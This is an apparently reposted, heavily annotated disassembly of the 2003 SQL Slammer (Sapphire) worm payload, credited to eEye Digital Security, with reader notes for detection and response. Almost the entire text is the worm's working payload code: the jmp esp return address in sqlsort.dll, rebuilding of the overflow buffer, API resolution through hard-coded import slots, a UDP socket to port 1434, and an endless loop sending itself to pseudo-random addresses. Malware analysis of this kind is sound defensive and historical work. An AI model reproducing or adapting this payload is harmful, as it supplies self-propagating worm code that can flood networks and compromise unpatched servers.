2003蠕虫王反汇编代码

王朝other·作者佚名  2008-05-19

;SAPPHIRE WORM CODE DISASSEMBLED (the worm is also widely called SQL Slammer)
;
;eEye Digital Security: January 25, 2003
;
; Reader notes (review): this is a disassembly listing of a historical worm
; payload, kept for analysis. It is not an assemblable source file on its own
; (hard-coded sqlsort.dll addresses, strings built on the stack). What the
; listing itself shows, for detection and response purposes:
;   - transport: one UDP socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP), destination
;     port 1434 (SQL Server Resolution Service), see the sockaddr_in at [ebp-50h]
;   - every datagram is 178h = 376 bytes, read from [ebp+3]: the byte 04h,
;     then 24 dwords of 01010101h, then whatever lies above on the stack
;     (presumably the rebuilt return address and the worm's own code, which is
;     how it propagates - confirm against a full packet capture)
;   - the destination IPv4 address is the raw output of the LCG at PRND,
;     seeded from GetTickCount; the LCG addend depends on a DLL address, so
;     the sequence is not a fixed one (see comment at "xor ebx")
;   - the send loop at PRND never exits and contains no delay, so an infected
;     host emits datagrams as fast as sendto returns (link saturation)
;   - nothing in this listing touches the file system or registry; as far as
;     the listing shows the infection is memory-resident only
; Stack frame after "mov ebp, esp" (each push is 4 bytes; NUL padding comes
; from the zeroed ecx / cx loads in between):
;   [ebp-10h] "kernel32.dll"    [ebp-20h] "GetTickCount"   [ebp-2Ch] "ws2_32.dll"
;   [ebp-34h] "socket"          [ebp-3Ch] "sendto"         [ebp-40h] ws2_32 base
;   [ebp-4Ch] LCG state (= sin_addr)   [ebp-50h] sockaddr_in, 16 bytes
;   [ebp-54h] socket handle
; Register roles: esi = IAT slot being called, later the sendto address;
; ebx = LCG addend; ebp = frame base; eax/ecx/edx scratch.

push 42B0C9DCh ; [RET] sqlsort.dll - jmp esp (rebuilds the overwritten return address on the stack)

mov eax, 1010101h ; Reconstruct session: after the overflow the payload buffer

; gets corrupted during program execution but before the

; payload is executed, so the 04h / 01h filler is rebuilt here.

xor ecx, ecx

mov cl, 18h ; 18h = 24 dwords of filler

FIXUP:

push eax

loop FIXUP ; ecx reaches 0 here; it is used as a NUL terminator below

xor eax, 5010101h ; 01010101h xor 05010101h = 04000000h; the 04h byte lands at [ebp+3]

push eax

mov ebp, esp ; ebp = base of the rebuilt packet image

push ecx ; NUL terminator for "kernel32.dll"

push 6C6C642Eh ; ".dll"

push 32336C65h ; "el32"

push 6E72656Bh ; kernel32 -> "kernel32.dll" starts at [ebp-10h]

push ecx ; NUL terminator for "GetTickCount"

push 746E756Fh ; GetTickCount -> "ount"

push 436B6369h ; "ickC"

push 54746547h ; "GetT" -> "GetTickCount" starts at [ebp-20h]

mov cx, 6C6Ch ; "ll\0\0"

push ecx

push 642E3233h ; ws2_32.dll -> "32.d"

push 5F327377h ; "ws2_" -> "ws2_32.dll" starts at [ebp-2Ch]

mov cx, 7465h ; "et\0\0"

push ecx

push 6B636F73h ; socket -> "sock"; "socket" starts at [ebp-34h]

mov cx, 6F74h ; "to\0\0"

push ecx

push 646E6573h ; sendto -> "send"; "sendto" starts at [ebp-3Ch]

mov esi, 42AE1018h ; IAT from sqlsort (slot assumed to hold LoadLibrary - hard-coded, version dependent)

lea eax, [ebp-2Ch] ; (ws2_32.dll)

push eax

call dword ptr [esi] ; call loadlibrary -> eax = ws2_32 base

push eax ; saved at [ebp-40h]

lea eax, [ebp-20h] ; "GetTickCount", second GetProcAddress argument

push eax

lea eax, [ebp-10h] ; (kernel32.dll)

push eax

call dword ptr [esi] ; loadlibrary -> eax = kernel32 base

push eax ; first GetProcAddress argument (hModule)

mov esi, 42AE1010h ; IAT from sqlsort (slot assumed to hold GetProcAddress)

mov ebx, [esi] ; ebx = GetProcAddress address read from the IAT slot

mov eax, [ebx] ; first 4 code bytes of that function

cmp eax, 51EC8B55h ; check entry point fingerprint: 55 8B EC 51 = push ebp / mov ebp,esp / push ecx

jz short VALID_GP ; Check entry point fingerprint for GetProcAddress; if it fails

; fall back to the GetProcAddress entry in another DLL version.

; Undetermined what DLL versions this will succeed on. Due

; to the lack of reliable importing this may not work across all

; DLL versions (a practical limit on which SQL Server builds the worm could run on).

mov esi, 42AE101Ch ; IAT entry - 77EA094C

VALID_GP:

call dword ptr [esi] ; GetProcAddress(kernel32, "GetTickCount")

call eax ; return from GetProcAddress = GetTickCount entry point; eax = tick count (LCG seed)

xor ecx, ecx

push ecx ; sin_zero, second half  -> [ebp-44h]

push ecx ; sin_zero, first half   -> [ebp-48h]

push eax ; sin_addr = tick count  -> [ebp-4Ch], also the LCG state

xor ecx, 9B040103h

xor ecx, 1010101h ; ecx = 9B040103h xor 01010101h = 9A050002h

push ecx ; 9A050002 = port 1434 / AF_INET (sin_port = 059Ah network order, sin_family = 2) -> [ebp-50h]

lea eax, [ebp-34h] ; (socket)

push eax

mov eax, [ebp-40h] ; ws2_32 base address

push eax

call dword ptr [esi] ; GetProcAddress(ws2_32, "socket")

push 11h ; protocol = 17 = IPPROTO_UDP

push 2 ; type = SOCK_DGRAM

push 2 ; af = AF_INET

call eax ; socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)

push eax ; socket handle saved at [ebp-54h]

lea eax, [ebp-3Ch] ; sendto

push eax

mov eax, [ebp-40h] ; ws2_32 base address

push eax

call dword ptr [esi] ; GetProcAddress(ws2_32, "sendto")

mov esi, eax ; save sendto - esi

or ebx, ebx ; no effect on the value of ebx (flags only)

xor ebx, 0FFD9613Ch ; LCG addend = GetProcAddress address xor 0FFD9613Ch; it varies with the DLL load address rather than being a fixed constant

PRND:

mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start: eax = x (previous state / previous target address)

lea ecx, [eax+eax*2] ; ecx = 3x

lea edx, [eax+ecx*4] ; edx = 13x

shl edx, 4 ; edx = 208x

add edx, eax ; edx = 209x

shl edx, 8 ; edx = 53504x

sub edx, eax ; edx = 53503x

lea eax, [eax+edx*4] ; eax = 214013x (the usual LCG multiplier)

add eax, ebx ; Pseudo Random Algorithm End: x' = 214013x + ebx (mod 2^32)

mov [ebp-4Ch], eax ; store state; this dword is sin_addr of the sockaddr_in at [ebp-50h]

push 10h ; tolen = 16 = sizeof(sockaddr_in)

lea eax, [ebp-50h] ; to = &sockaddr_in

push eax

xor ecx, ecx

push ecx ; flags = 0

xor cx, 178h ; len = 178h = 376 bytes

push ecx

lea eax, [ebp+3] ; buf = the 04h byte and everything above it on the stack

push eax

mov eax, [ebp-54h] ; socket handle

push eax

call esi ; sendto(s, buf, 376, 0, &to, 16)

jmp short PRND ; Jump back to Pseudo Random Algorithm Start (unconditional; no exit and no delay)

 
 
 
 
 